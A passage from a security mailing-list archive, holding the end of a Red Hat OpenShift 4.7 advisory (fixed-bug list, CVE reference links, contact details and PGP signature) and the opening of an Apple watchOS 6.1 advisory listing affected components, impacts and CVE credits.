1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics
1915885 - Kuryr doesn't support workers running on multiple subnets
1915898 - TaskRun log output shows "undefined" in streaming
1915907 - test/cmd/builds.sh uses docker.io
1915912 - sig-storage-csi-snapshotter image not available
1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART
1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard
1915939 - Resizing the browser window removes Web Terminal Icon
1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance]
1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7
1915962 - ROKS: manifest with machine health check fails to apply in 4.7
1915972 - Global configuration breadcrumbs do not work as expected
1915981 - Install ethtool and conntrack in container for debugging
1915995 - "Edit RoleBinding Subject" action under RoleBinding list page kebab actions causes unhandled exception
1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups
1916021 - OLM enters infinite loop if Pending CSV replaces itself
1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry
1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert's annotations
1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk
1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration
1916145 - Explicitly set minimum versions of python libraries
1916164 - Update csi-driver-nfs builder & base images to be consistent with ART
1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7
1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third
1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2
1916379 - error metrics from vsphere-problem-detector should be gauge
1916382 - Can't create ext4 filesystems with Ignition
1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving 'verified: false' even for verified updates
1916401 - Deleting an ingress controller with a bad DNS Record hangs
1916417 - [Kuryr] Must-gather does not have all Custom Resources information
1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image
1916454 - teach CCO about upgradeability from 4.6 to 4.7
1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation
1916502 - Boot disk mirroring fails with mdadm error
1916524 - Two rootdisk shows on storage step
1916580 - Default yaml is broken for VM and VM template
1916621 - oc adm node-logs examples are wrong
1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret.
1916692 - Possibly fails to destroy LB and thus cluster
1916711 - Update Kube dependencies in MCO to 1.20.0
1916747 - remove links to quick starts if virtualization operator isn't updated to 2.6
1916764 - editing a workload with no application applied, will auto fill the app
1916834 - Pipeline Metrics - Text Updates
1916843 - collect logs from openshift-sdn-controller pod
1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed
1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually
1916888 - OCS wizard Donor chart does not get updated when `Device Type` is edited
1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error "Forbidden: cannot specify lbFloatingIP and apiFloatingIP together"
1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace
1917101 - [UPI on oVirt] - 'RHCOS image' topic isn't located in the right place in UPI document
1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to '"ProxyConfigController" controller failed to sync "key"' error
1917117 - Common templates - disks screen: invalid disk name
1917124 - Custom template - clone existing PVC - the name of the target VM's data volume is hard-coded; only one VM can be created
1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator
1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable.
1917148 - [oVirt] Consume 23-10 ovirt sdk
1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened
1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console
1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory
1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7
1917327 - annotations.message maybe wrong for NTOPodsNotReady alert
1917367 - Refactor periodic.go
1917371 - Add docs on how to use the built-in profiler
1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console
1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui
1917484 - [BM][IPI] Failed to scale down machineset
1917522 - Deprecate --filter-by-os in oc adm catalog mirror
1917537 - controllers continuously busy reconciling operator
1917551 - use min_over_time for vsphere prometheus alerts
1917585 - OLM Operator install page missing i18n
1917587 - Manila CSI operator becomes degraded if user doesn't have permissions to list share types
1917605 - Deleting an exgw causes pods to no longer route to other exgws
1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API
1917656 - Add to Project/application for eventSources from topology shows 404
1917658 - Show TP badge for sources powered by camel connectors in create flow
1917660 - Editing parallelism of job get error info
1917678 - Could not provision pv when no symlink and target found on rhel worker
1917679 - Hide double CTA in admin pipelineruns tab
1917683 - `NodeTextFileCollectorScrapeError` alert in OCP 4.6 cluster.
1917759 - Console operator panics after setting plugin that does not exists to the console-operator config
1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0
1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0
1917799 - Gather s list of names and versions of installed OLM operators
1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error
1917814 - Show Broker create option in eventing under admin perspective
1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types
1917872 - [oVirt] rebase on latest SDK 2021-01-12
1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image
1917938 - upgrade version of dnsmasq package
1917942 - Canary controller causes panic in ingress-operator
1918019 - Undesired scrollbars in markdown area of QuickStart
1918068 - Flaky olm integration tests
1918085 - reversed name of job and namespace in cvo log
1918112 - Flavor is not editable if a customize VM is created from cli
1918129 - Update IO sample archive with missing resources & remove IP anonymization from clusteroperator resources
1918132 - i18n: Volume Snapshot Contents menu is not translated
1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2
1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn't be installed on OSP
1918153 - When `&` character is set as an environment variable in a build config it is getting converted as `\u0026`
1918185 - Capitalization on PLR details page
1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections
1918318 - Kamelet connector's are not shown in eventing section under Admin perspective
1918351 - Gather SAP configuration (SCC & ClusterRoleBinding)
1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews
1918395 - [ovirt] increase livenessProbe period
1918415 - MCD nil pointer on dropins
1918438 - [ja_JP, zh_CN] Serverless i18n misses
1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig
1918471 - CustomNoUpgrade Feature gates are not working correctly
1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk
1918622 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART
1918623 - Updating ose-jenkins-agent-nodejs-12 builder & base images to be consistent with ART
1918625 - Updating ose-jenkins-agent-nodejs-10 builder & base images to be consistent with ART
1918635 - Updating openshift-jenkins-2 builder & base images to be consistent with ART #1197
1918639 - Event listener with triggerRef crashes the console
1918648 - Subscription page doesn't show InstallPlan correctly
1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack
1918748 - helmchartrepo is not http(s)_proxy-aware
1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI
1918803 - Need dedicated details page w/ global config breadcrumbs for 'KnativeServing' plugin
1918826 - Insights popover icons are not horizontally aligned
1918879 - need better debug for bad pull secrets
1918958 - The default NMstate instance from the operator is incorrect
1919097 - Close bracket ")" missing at the end of the sentence in the UI
1919231 - quick search modal cut off on smaller screens
1919259 - Make "Add x" singular in Pipeline Builder
1919260 - VM Template list actions should not wrap
1919271 - NM prepender script doesn't support systemd-resolved
1919341 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART
1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry
1919379 - dotnet logo out of date
1919387 - Console login fails with no error when it can't write to localStorage
1919396 - A11y Violation: svg-img-alt on Pod Status ring
1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren't verified
1919750 - Search InstallPlans got Minified React error
1919778 - Upgrade is stuck in insights operator Degraded with "Source clusterconfig could not be retrieved" until insights operator pod is manually deleted
1919823 - OCP 4.7 Internationalization Chinese tranlate issue
1919851 - Visualization does not render when Pipeline & Task share same name
1919862 - The tip information for `oc new-project --skip-config-write` is wrong
1919876 - VM created via customize wizard cannot inherit template's PVC attributes
1919877 - Click on KSVC breaks with white screen
1919879 - The toolbox container name is changed from 'toolbox-root' to 'toolbox-' in a chroot environment
1919945 - user entered name value overridden by default value when selecting a git repository
1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference
1919970 - NTO does not update when the tuned profile is updated.
1919999 - Bump Cluster Resource Operator Golang Versions
1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration
1920200 - user-settings network error results in infinite loop of requests
1920205 - operator-registry e2e tests not working properly
1920214 - Bump golang to 1.15 in cluster-resource-override-admission
1920248 - re-running the pipelinerun with pipelinespec crashes the UI
1920320 - VM template field is "Not available" if it's created from common template
1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode is `Disk Mode`
1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs
1920390 - Monitoring > Metrics graph shifts to the left when clicking the "Stacked" option and when toggling data series lines on / off
1920426 - Egress Router CNI OWNERS file should have ovn-k team members
1920427 - Need to update `oc login` help page since we don't support prompt interactively for the username
1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time
1920438 - openshift-tuned panics on turning debugging on/off.
1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn
1920481 - kuryr-cni pods using unreasonable amount of CPU
1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof
1920524 - Topology graph crashes adding Open Data Hub operator
1920526 - catalog operator causing CPU spikes and bad etcd performance
1920551 - Boot Order is not editable for Templates in "openshift" namespace
1920555 - bump cluster-resource-override-admission api dependencies
1920571 - fcp multipath will not recover failed paths automatically
1920619 - Remove default scheduler profile value
1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present
1920674 - MissingKey errors in bindings namespace
1920684 - Text in language preferences modal is misleading
1920695 - CI is broken because of bad image registry reference in the Makefile
1920756 - update generic-admission-server library to get the system:masters authorization optimization
1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for "network-check-target" failed when "defaultNodeSelector" is set
1920771 - i18n: Delete persistent volume claim drop down is not translated
1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI
1920912 - Unable to power off BMH from console
1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by "2"
1920984 - [e2e][automation] some menu items names are out dated
1921013 - Gather PersistentVolume definition (if any) used in image registry config
1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior)
1921087 - 'start next quick start' link doesn't work and is unintuitive
1921088 - test-cmd is failing on volumes.sh pretty consistently
1921248 - Clarify the kubelet configuration cr description
1921253 - Text filter default placeholder text not internationalized
1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window
1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo
1921277 - Fix Warning and Info log statements to handle arguments
1921281 - oc get -o yaml --export returns "error: unknown flag: --export"
1921458 - [SDK] Gracefully handle the `run bundle-upgrade` if the lower version operator doesn't exist
1921556 - [OCS with Vault]: OCS pods didn't comeup after deploying with Vault details from UI
1921572 - For external source (i.e GitHub Source) form view as well shows yaml
1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass
1921610 - Pipeline metrics font size inconsistency
1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1921655 - [OSP] Incorrect error handling during cloudinfo generation
1921713 - [e2e][automation] fix failing VM migration tests
1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view
1921774 - delete application modal errors when a resource cannot be found
1921806 - Explore page APIResourceLinks aren't i18ned
1921823 - CheckBoxControls not internationalized
1921836 - AccessTableRows don't internationalize "User" or "Group"
1921857 - Test flake when hitting router in e2e tests due to one router not being up to date
1921880 - Dynamic plugins are not initialized on console load in production mode
1921911 - Installer PR #4589 is causing leak of IAM role policy bindings
1921921 - "Global Configuration" breadcrumb does not use sentence case
1921949 - Console bug - source code URL broken for gitlab self-hosted repositories
1921954 - Subscription-related constraints in ResolutionFailed events are misleading
1922015 - buttons in modal header are invisible on Safari
1922021 - Nodes terminal page 'Expand' 'Collapse' button not translated
1922050 - [e2e][automation] Improve vm clone tests
1922066 - Cannot create VM from custom template which has extra disk
1922098 - Namespace selection dialog is not closed after select a namespace
1922099 - Updated Readme documentation for QE code review and setup
1922146 - Egress Router CNI doesn't have logging support.
1922267 - Collect specific ADFS error
1922292 - Bump RHCOS boot images for 4.7
1922454 - CRI-O doesn't enable pprof by default
1922473 - reconcile LSO images for 4.8
1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace
1922782 - Source registry missing docker:// in yaml
1922907 - Interop UI Tests - step implementation for updating feature files
1922911 - Page crash when click the "Stacked" checkbox after clicking the data series toggle buttons
1922991 - "verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build" test fails on OKD
1923003 - WebConsole Insights widget showing "Issues pending" when the cluster doesn't report anything
1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources
1923102 - [vsphere-problem-detector-operator] pod's version is not correct
1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot
1923674 - k8s 1.20 vendor dependencies
1923721 - PipelineRun running status icon is not rotating
1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios
1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator
1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator
1923874 - Unable to specify values with % in kubeletconfig
1923888 - Fixes error metadata gathering
1923892 - Update arch.md after refactor.
1923894 - "installed" operator status in operatorhub page does not reflect the real status of operator
1923895 - Changelog generation.
1923911 - [e2e][automation] Improve tests for vm details page and list filter
1923945 - PVC Name and Namespace resets when user changes os/flavor/workload
1923951 - EventSources shows `undefined` in project
1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins
1924046 - Localhost: Refreshing on a Project removes it from nav item urls
1924078 - Topology quick search View all results footer should be sticky.
1924081 - NTO should ship the latest Tuned daemon release 2.15
1924084 - backend tests incorrectly hard-code artifacts dir
1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build
1924135 - Under sufficient load, CRI-O may segfault
1924143 - Code Editor Decorator url is broken for Bitbucket repos
1924188 - Language selector dropdown doesn't always pre-select the language
1924365 - Add extra disk for VM which use boot source PXE
1924383 - Degraded network operator during upgrade to 4.7.z
1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box.
1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can't set finalizers on
1924583 - Deprectaed templates are listed in the Templates screen
1924870 - pick upstream pr#96901: plumb context with request deadline
1924955 - Images from Private external registry not working in deploy Image
1924961 - k8sutil.TrimDNS1123Label creates invalid values
1924985 - Build egress-router-cni for both RHEL 7 and 8
1925020 - Console demo plugin deployment image shoult not point to dockerhub
1925024 - Remove extra validations on kafka source form view net section
1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running
1925072 - NTO needs to ship the current latest stalld v1.7.0
1925163 - Missing info about dev catalog in boot source template column
1925200 - Monitoring Alert icon is missing on the workload in Topology view
1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1
1925319 - bash syntax error in configure-ovs.sh script
1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data
1925516 - Pipeline Metrics Tooltips are overlapping data
1925562 - Add new ArgoCD link from GitOps application environments page
1925596 - Gitops details page image and commit id text overflows past card boundary
1926556 - 'excessive etcd leader changes' test case failing in serial job because prometheus data is wiped by machine set test
1926588 - The tarball of operator-sdk is not ready for ocp4.7
1927456 - 4.7 still points to 4.6 catalog images
1927500 - API server exits non-zero on 2 SIGTERM signals
1929278 - Monitoring workloads using too high a priorityclass
1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api
1929920 - Cluster monitoring documentation link is broken - 404 not found
5. References:
https://access.redhat.com/security/cve/CVE-2018-10103
https://access.redhat.com/security/cve/CVE-2018-10105
https://access.redhat.com/security/cve/CVE-2018-14461
https://access.redhat.com/security/cve/CVE-2018-14462
https://access.redhat.com/security/cve/CVE-2018-14463
https://access.redhat.com/security/cve/CVE-2018-14464
https://access.redhat.com/security/cve/CVE-2018-14465
https://access.redhat.com/security/cve/CVE-2018-14466
https://access.redhat.com/security/cve/CVE-2018-14467
https://access.redhat.com/security/cve/CVE-2018-14468
https://access.redhat.com/security/cve/CVE-2018-14469
https://access.redhat.com/security/cve/CVE-2018-14470
https://access.redhat.com/security/cve/CVE-2018-14553
https://access.redhat.com/security/cve/CVE-2018-14879
https://access.redhat.com/security/cve/CVE-2018-14880
https://access.redhat.com/security/cve/CVE-2018-14881
https://access.redhat.com/security/cve/CVE-2018-14882
https://access.redhat.com/security/cve/CVE-2018-16227
https://access.redhat.com/security/cve/CVE-2018-16228
https://access.redhat.com/security/cve/CVE-2018-16229
https://access.redhat.com/security/cve/CVE-2018-16230
https://access.redhat.com/security/cve/CVE-2018-16300
https://access.redhat.com/security/cve/CVE-2018-16451
https://access.redhat.com/security/cve/CVE-2018-16452
https://access.redhat.com/security/cve/CVE-2018-20843
https://access.redhat.com/security/cve/CVE-2019-3884
https://access.redhat.com/security/cve/CVE-2019-5018
https://access.redhat.com/security/cve/CVE-2019-6977
https://access.redhat.com/security/cve/CVE-2019-6978
https://access.redhat.com/security/cve/CVE-2019-8625
https://access.redhat.com/security/cve/CVE-2019-8710
https://access.redhat.com/security/cve/CVE-2019-8720
https://access.redhat.com/security/cve/CVE-2019-8743
https://access.redhat.com/security/cve/CVE-2019-8764
https://access.redhat.com/security/cve/CVE-2019-8766
https://access.redhat.com/security/cve/CVE-2019-8769
https://access.redhat.com/security/cve/CVE-2019-8771
https://access.redhat.com/security/cve/CVE-2019-8782
https://access.redhat.com/security/cve/CVE-2019-8783
https://access.redhat.com/security/cve/CVE-2019-8808
https://access.redhat.com/security/cve/CVE-2019-8811
https://access.redhat.com/security/cve/CVE-2019-8812
https://access.redhat.com/security/cve/CVE-2019-8813
https://access.redhat.com/security/cve/CVE-2019-8814
https://access.redhat.com/security/cve/CVE-2019-8815
https://access.redhat.com/security/cve/CVE-2019-8816
https://access.redhat.com/security/cve/CVE-2019-8819
https://access.redhat.com/security/cve/CVE-2019-8820
https://access.redhat.com/security/cve/CVE-2019-8823
https://access.redhat.com/security/cve/CVE-2019-8835
https://access.redhat.com/security/cve/CVE-2019-8844
https://access.redhat.com/security/cve/CVE-2019-8846
https://access.redhat.com/security/cve/CVE-2019-9455
https://access.redhat.com/security/cve/CVE-2019-9458
https://access.redhat.com/security/cve/CVE-2019-11068
https://access.redhat.com/security/cve/CVE-2019-12614
https://access.redhat.com/security/cve/CVE-2019-13050
https://access.redhat.com/security/cve/CVE-2019-13225
https://access.redhat.com/security/cve/CVE-2019-13627
https://access.redhat.com/security/cve/CVE-2019-14889
https://access.redhat.com/security/cve/CVE-2019-15165
https://access.redhat.com/security/cve/CVE-2019-15166
https://access.redhat.com/security/cve/CVE-2019-15903
https://access.redhat.com/security/cve/CVE-2019-15917
https://access.redhat.com/security/cve/CVE-2019-15925
https://access.redhat.com/security/cve/CVE-2019-16167
https://access.redhat.com/security/cve/CVE-2019-16168
https://access.redhat.com/security/cve/CVE-2019-16231
https://access.redhat.com/security/cve/CVE-2019-16233
https://access.redhat.com/security/cve/CVE-2019-16935
https://access.redhat.com/security/cve/CVE-2019-17450
https://access.redhat.com/security/cve/CVE-2019-17546
https://access.redhat.com/security/cve/CVE-2019-18197
https://access.redhat.com/security/cve/CVE-2019-18808
https://access.redhat.com/security/cve/CVE-2019-18809
https://access.redhat.com/security/cve/CVE-2019-19046
https://access.redhat.com/security/cve/CVE-2019-19056
https://access.redhat.com/security/cve/CVE-2019-19062
https://access.redhat.com/security/cve/CVE-2019-19063
https://access.redhat.com/security/cve/CVE-2019-19068
https://access.redhat.com/security/cve/CVE-2019-19072
https://access.redhat.com/security/cve/CVE-2019-19221
https://access.redhat.com/security/cve/CVE-2019-19319
https://access.redhat.com/security/cve/CVE-2019-19332
https://access.redhat.com/security/cve/CVE-2019-19447
https://access.redhat.com/security/cve/CVE-2019-19524
https://access.redhat.com/security/cve/CVE-2019-19533
https://access.redhat.com/security/cve/CVE-2019-19537
https://access.redhat.com/security/cve/CVE-2019-19543
https://access.redhat.com/security/cve/CVE-2019-19602
https://access.redhat.com/security/cve/CVE-2019-19767
https://access.redhat.com/security/cve/CVE-2019-19770
https://access.redhat.com/security/cve/CVE-2019-19906
https://access.redhat.com/security/cve/CVE-2019-19956
https://access.redhat.com/security/cve/CVE-2019-20054
https://access.redhat.com/security/cve/CVE-2019-20218
https://access.redhat.com/security/cve/CVE-2019-20386
https://access.redhat.com/security/cve/CVE-2019-20387
https://access.redhat.com/security/cve/CVE-2019-20388
https://access.redhat.com/security/cve/CVE-2019-20454
https://access.redhat.com/security/cve/CVE-2019-20636
https://access.redhat.com/security/cve/CVE-2019-20807
https://access.redhat.com/security/cve/CVE-2019-20812
https://access.redhat.com/security/cve/CVE-2019-20907
https://access.redhat.com/security/cve/CVE-2019-20916
https://access.redhat.com/security/cve/CVE-2020-0305
https://access.redhat.com/security/cve/CVE-2020-0444
https://access.redhat.com/security/cve/CVE-2020-1716
https://access.redhat.com/security/cve/CVE-2020-1730
https://access.redhat.com/security/cve/CVE-2020-1751
https://access.redhat.com/security/cve/CVE-2020-1752
https://access.redhat.com/security/cve/CVE-2020-1971
https://access.redhat.com/security/cve/CVE-2020-2574
https://access.redhat.com/security/cve/CVE-2020-2752
https://access.redhat.com/security/cve/CVE-2020-2922
https://access.redhat.com/security/cve/CVE-2020-3862
https://access.redhat.com/security/cve/CVE-2020-3864
https://access.redhat.com/security/cve/CVE-2020-3865
https://access.redhat.com/security/cve/CVE-2020-3867
https://access.redhat.com/security/cve/CVE-2020-3868
https://access.redhat.com/security/cve/CVE-2020-3885
https://access.redhat.com/security/cve/CVE-2020-3894
https://access.redhat.com/security/cve/CVE-2020-3895
https://access.redhat.com/security/cve/CVE-2020-3897
https://access.redhat.com/security/cve/CVE-2020-3898
https://access.redhat.com/security/cve/CVE-2020-3899
https://access.redhat.com/security/cve/CVE-2020-3900
https://access.redhat.com/security/cve/CVE-2020-3901
https://access.redhat.com/security/cve/CVE-2020-3902
https://access.redhat.com/security/cve/CVE-2020-6405
https://access.redhat.com/security/cve/CVE-2020-7595
https://access.redhat.com/security/cve/CVE-2020-7774
https://access.redhat.com/security/cve/CVE-2020-8177
https://access.redhat.com/security/cve/CVE-2020-8492
https://access.redhat.com/security/cve/CVE-2020-8563
https://access.redhat.com/security/cve/CVE-2020-8566
https://access.redhat.com/security/cve/CVE-2020-8619
https://access.redhat.com/security/cve/CVE-2020-8622
https://access.redhat.com/security/cve/CVE-2020-8623
https://access.redhat.com/security/cve/CVE-2020-8624
https://access.redhat.com/security/cve/CVE-2020-8647
https://access.redhat.com/security/cve/CVE-2020-8648
https://access.redhat.com/security/cve/CVE-2020-8649
https://access.redhat.com/security/cve/CVE-2020-9327
https://access.redhat.com/security/cve/CVE-2020-9802
https://access.redhat.com/security/cve/CVE-2020-9803
https://access.redhat.com/security/cve/CVE-2020-9805
https://access.redhat.com/security/cve/CVE-2020-9806
https://access.redhat.com/security/cve/CVE-2020-9807
https://access.redhat.com/security/cve/CVE-2020-9843
https://access.redhat.com/security/cve/CVE-2020-9850
https://access.redhat.com/security/cve/CVE-2020-9862
https://access.redhat.com/security/cve/CVE-2020-9893
https://access.redhat.com/security/cve/CVE-2020-9894
https://access.redhat.com/security/cve/CVE-2020-9895
https://access.redhat.com/security/cve/CVE-2020-9915
https://access.redhat.com/security/cve/CVE-2020-9925
https://access.redhat.com/security/cve/CVE-2020-10018
https://access.redhat.com/security/cve/CVE-2020-10029
https://access.redhat.com/security/cve/CVE-2020-10732
https://access.redhat.com/security/cve/CVE-2020-10749
https://access.redhat.com/security/cve/CVE-2020-10751
https://access.redhat.com/security/cve/CVE-2020-10763
https://access.redhat.com/security/cve/CVE-2020-10773
https://access.redhat.com/security/cve/CVE-2020-10774
https://access.redhat.com/security/cve/CVE-2020-10942
https://access.redhat.com/security/cve/CVE-2020-11565
https://access.redhat.com/security/cve/CVE-2020-11668
https://access.redhat.com/security/cve/CVE-2020-11793
https://access.redhat.com/security/cve/CVE-2020-12465
https://access.redhat.com/security/cve/CVE-2020-12655
https://access.redhat.com/security/cve/CVE-2020-12659
https://access.redhat.com/security/cve/CVE-2020-12770
https://access.redhat.com/security/cve/CVE-2020-12826
https://access.redhat.com/security/cve/CVE-2020-13249
https://access.redhat.com/security/cve/CVE-2020-13630
https://access.redhat.com/security/cve/CVE-2020-13631
https://access.redhat.com/security/cve/CVE-2020-13632
https://access.redhat.com/security/cve/CVE-2020-14019
https://access.redhat.com/security/cve/CVE-2020-14040
https://access.redhat.com/security/cve/CVE-2020-14381
https://access.redhat.com/security/cve/CVE-2020-14382
https://access.redhat.com/security/cve/CVE-2020-14391
https://access.redhat.com/security/cve/CVE-2020-14422
https://access.redhat.com/security/cve/CVE-2020-15157
https://access.redhat.com/security/cve/CVE-2020-15503
https://access.redhat.com/security/cve/CVE-2020-15862
https://access.redhat.com/security/cve/CVE-2020-15999
https://access.redhat.com/security/cve/CVE-2020-16166
https://access.redhat.com/security/cve/CVE-2020-24490
https://access.redhat.com/security/cve/CVE-2020-24659
https://access.redhat.com/security/cve/CVE-2020-25211
https://access.redhat.com/security/cve/CVE-2020-25641
https://access.redhat.com/security/cve/CVE-2020-25658
https://access.redhat.com/security/cve/CVE-2020-25661
https://access.redhat.com/security/cve/CVE-2020-25662
https://access.redhat.com/security/cve/CVE-2020-25681
https://access.redhat.com/security/cve/CVE-2020-25682
https://access.redhat.com/security/cve/CVE-2020-25683
https://access.redhat.com/security/cve/CVE-2020-25684
https://access.redhat.com/security/cve/CVE-2020-25685
https://access.redhat.com/security/cve/CVE-2020-25686
https://access.redhat.com/security/cve/CVE-2020-25687
https://access.redhat.com/security/cve/CVE-2020-25694
https://access.redhat.com/security/cve/CVE-2020-25696
https://access.redhat.com/security/cve/CVE-2020-26160
https://access.redhat.com/security/cve/CVE-2020-27813
https://access.redhat.com/security/cve/CVE-2020-27846
https://access.redhat.com/security/cve/CVE-2020-28362
https://access.redhat.com/security/cve/CVE-2020-29652
https://access.redhat.com/security/cve/CVE-2021-2007
https://access.redhat.com/security/cve/CVE-2021-3121
https://access.redhat.com/security/updates/classification/#moderate
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T
lmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H
EmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8
4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4
mWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL
ISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy
Ae5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk
4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM
uR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG
krzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv
RjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6
McvuEaxco7U=
=sw8i
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-10-29-4 watchOS 6.1
watchOS 6.1 is now available and addresses the following:
Accounts
Available for: Apple Watch Series 1 and later
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at
Technische Universität Darmstadt
App Store
Available for: Apple Watch Series 1 and later
Impact: A local attacker may be able to login to the account of a
previously logged in user without valid credentials.
CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu)
AppleFirmwareUpdateKext
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption vulnerability was addressed with
improved locking.
CVE-2019-8785: Ian Beer of Google Project Zero
CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure
Contacts
Available for: Apple Watch Series 1 and later
